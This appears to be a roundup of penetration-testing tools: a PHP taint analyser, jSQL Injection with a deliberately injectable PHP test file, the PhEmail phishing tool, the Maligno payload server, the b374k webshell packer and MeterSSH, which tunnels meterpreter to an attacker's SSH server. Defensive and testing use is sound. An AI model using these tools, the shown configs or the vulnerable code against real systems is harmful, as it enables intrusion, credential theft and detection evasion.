This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points ($_GET, $_POST arrays) and to verify if they reaches some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of the fixes (small pieces of code) in the source code.

WAP is written in Java language and is constituted by three modules:

• Code Analyzer: composed by tree generator and taint analyser. The tool has integrated a lexer and a parser generated by ANTLR, and based in a grammar and a tree grammar written to PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Sintatic Tree) to each PHP file. The taint analyzer performs the taint analysis navigating through the AST to detect potentials vulnerabilities.

• False Positives Predictor: composed by a supervised trained data set with instances classified as being vulnerabilities and false positives and by the Logistic Regression machine learning algorithm. For each potential vulnerability detected by code analyser, this module collects the presence of the attributes that define a false positive. Then, the Logistic Regression algorithm receives them and classifies the instance as being a false positive or not (real vulnerability).

• Code Corrector: Each real vulnerability is removed by correction of its source code. This module for the type of vulnerability selects the fix that removes the vulnerability and signalizes the places in the source code where the fix will be inserted. Then, the code is corrected with the insertion of the fixes and new files are created.

More information can be found at: http://sourceforge.net/projects/awap/files/

jSQL Injection – a java tool for automatic sql database injection.

jSQL Injection

jSQL Injection is a lightweight application used to find database information from a distant server. Tool is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL Injection alpha-v0.6.0

Features:

• GET, POST, header, cookie methods
• Normal, error based, blind, time based algorithms
• Automatic best algorithm selection
• Multi-thread control (start/pause/resume/stop)
• Progression bars
• Shows URL calls
• Simple evasion
• Proxy setting
• Distant file reading
• Webshell deposit
• Terminal for webshell commands
• Configuration backup
• Update checker
• Admin page checker
• Brute forcer (md5 mysql…)
• Coder (encode decode base64 hex md5…)
• Supports MySQL

Injection and local test

Running injection requires the URL of a local or distant server, and the name of parameter to inject.
For a local test, you can save the following PHP code into file ‘simulate_get.php’ and move it to the root folder of your web server (e.g /www), then use http://127.0.0.1/simulate_get.php?lib=  and finally click Connect to read the local database:

<?php
    mysql_connect("localhost","root","");
    mysql_select_db("my_own_database");

    $result = mysql_query("SELECT * FROM my_own_table where my_own_field = ". $_GET['lib'])# time based
        ordie( mysql_error());# error based

    if( mysql_num_rows($result)!==0) echo " something ";# blind

    while( $row = mysql_fetch_array($result, MYSQL_NUM))
        echo join(',',$row);# normal?>

 

More information can be found at: https://github.com/ron190/jsql-injection

sn00p – a modular tool written in bourne shell and designed to chain and automate security tools and tests.

sn00p

sn00p is a modular tool written in bourne shell and designed to chain and automate security tools and tests. It parses target definitions from the command line and runs corresponding modules afterwards. Also, tool can parse a given nmap logfile for open tcp and udp ports. All results will be logged in specified directories and a report can subsequently be generated.

It is easy to adjust tool according to your needs by simply adding your own modules and audits.

sn00p is NOT intended to be a security framework or scanner! It is up to the user to define his own modules and audits. The predefined modules are written as examples using well-known tools and test scenarios.

sn00p has 6 module directories: 

•  host
•  tcp
•  udp
•  web
•  lan
•  wlan

These directories contain predefined modules with well-known security tools and tests.

Audits are defined in modules. They are subroutines, which run basically any security tools and tests and log the results in logfiles

More information can be found at: http://nullsecurity.net/tools/automation.html

PhEmail – a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test

PhEmail

PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to garther email addresses through LinkedIN, useful during the information gathering phase. Also, this tool supports Gmail authentication which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

In recent years networks have become more secure through server hardening and deployment of security devices such as firewalls and intrusion prevention systems. This has made it harder for hackers and cyber criminals to launch successful direct attacks from outside of the network perimeter. As a result, hackers and cyber criminals are increasingly resorting to indirect attacks through social engineering and phishing emails.

What are social engineering and phishing attacks?

Social engineering is the art of tricking people into performing actions or revealing information with the aim of gaining access to information systems or confidential information. There are several social engineering attacks and techniques such as phishing emails, pretexting and tailgating.

Phishing is one of the easiest and most widely used social engineering attacks, where the attackers send spoofed emails that appear to be from a trusted individual or company such as a colleague or a supplier. The emails will often look identical to legitimate emails and will include company logos and email signatures. Once attackers successfully trick the victim into clicking on a malicious link or opening a booby-trapped document, they can bypass the company’s external defence mechanisms and gain a foothold in the internal network. This could allow them to gain access to sensitive and confidential information which might have financial or reputational consequences.

Installation

You can download the latest version of PhEmail by cloning the GitHub repository:

git clone https://github.com/Dionach/PhEmail

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
          -e    emails: File containing list of emails (Default: emails.txt)
          -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
          -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
          -s    subject: Subject of the email (Default: Newsletter)
          -b    body: Body of the email (Default: body.txt)
          -p    pages: Specifies number of results pages searched (Default: 10 pages)
          -v    verbose: Verbose Mode (Default: false)
          -l    layout: Send email with no embedded pictures 
          -B    BeEF: Add the hook for BeEF
          -m    mail_server: SMTP mail server to connect to
          -g    Google: Use a google account username:password
          -t    Time delay: Add deleay between each email (Default: 3 sec)
          -R    Bunch of emails per time (Default: 10 emails)
          -L    webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
          -S    Search: query on Google
          -d    domain: of email addresses
          -n    number: of emails per connection (Default: 10 emails)
          -c    clone: Clone a web page
          -w    website: where the phishing email link points to
          -o    save output in a file
          -F    Format (Default: 0): 
                0- firstname surname
                1- firstname.surname@example.com
                2- firstnamesurname@example.com
                3- f.surname@example.com
                4- firstname.s@example.com
                5- surname.firstname@example.com
                6- s.firstname@example.com
                7- surname.f@example.com
                8- surnamefirstname@example.com
                9- firstname_surname@example.com 

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com

Usage of PhEmail for attacking targets without prior mutual consent is illegal

What can you do to protect yourself?

These attacks rely on and exploit weaknesses in human nature. Companies can take several steps to protect themselves and reduce the likelihood of such attacks being successful. The first step is to build a good security training and awareness program in which staff members are taught the dangers of phishing emails and how to identify such emails. The second step is to conduct regular client-side and social engineering tests which include sending targeted phishing emails. This would help the company evaluate the effectiveness of the security training and awareness program and how to improve it to try and eliminate the risk of such attacks.

More information can be found at: https://github.com/Dionach/PhEmail

Maligno – an open source penetration testing tool written in Python that serves Metasploit payloads.

Maligno

Maligno is an open source penetration testing tool written in python, that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine. As a result, you should get your Metasploit session while avoiding detection.

More information can be found at: http://www.encripto.no/tools/

b374k – PHP Webshell with handy features

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser

Features:

• File manager (view, edit, rename, delete, upload, download, archiver, etc)
• Search file, file content, folder (also using regex)
• Command execution
• Script execution (php, perl, python, ruby, java, node.js, c)
• Give you shell via bind/reverse shell connect
• Simple packet crafter
• Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
• SQL Explorer
• Process list/Task manager
• Send mail with attachment (you can attach local file on server)
• String conversion
• All of that only in 1 file, no installation needed
• Support PHP > 4.3.3 and PHP 5

Requirements:

• PHP version > 4.3.3 and PHP 5
• As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
• Responsibility of what you do with this shell

Installation:

Download b374k.php (default password : b374k), edit and change password and upload b374k.php to your server, password is in sha1(md5()) format. Or create your own b374k.php, explained below

Customize:

After finished doing editing with files, upload index.php, base, module, theme and all files inside it to a server

Using Web Browser :

Open index.php in your browser, quick run will only run the shell. Use packer to pack all files into single PHP file. Set all the options available and the output file will be in the same directory as index.php

Using Console :

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes

example :

$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

Don’t forget to delete index.php, base, module, theme and all files inside it after you finished. Because it is not protected with password so it can be a security threat to your server

More information can be found at: https://github.com/b374k/b374k

MeterSSH – Meterpreter over SSH

As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines.

MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpeter in this case) by the shellcode over SSH back to the attackers machine. Then connecting with meterpreter’s listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.

Features

1. Meterpreter over SSH
2. Ability to configure different IP’s, addresses, etc. without the need to ever change the shellcode.
3. Monitor for the SSH connection and automatically spawn the shell

Usage

MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel.

There are two files, monitor.py and meterssh.py.

• monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell.
• meterssh.py – this is what you would deploy to the victim machine – note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller.

There are two files, monitor.py and meterssh.py.

Fields you need to edit inside meterssh.py

user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"

• user – this is the user account for the attackers SSH server (do not use root, does not need root)
• password – this is the password for the attackers SSH server
• rhost – this is the attackers SSH server IP address
• port – this is the attackers SSH server port

Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify.

More information can be found at: https://github.com/trustedsec/meterssh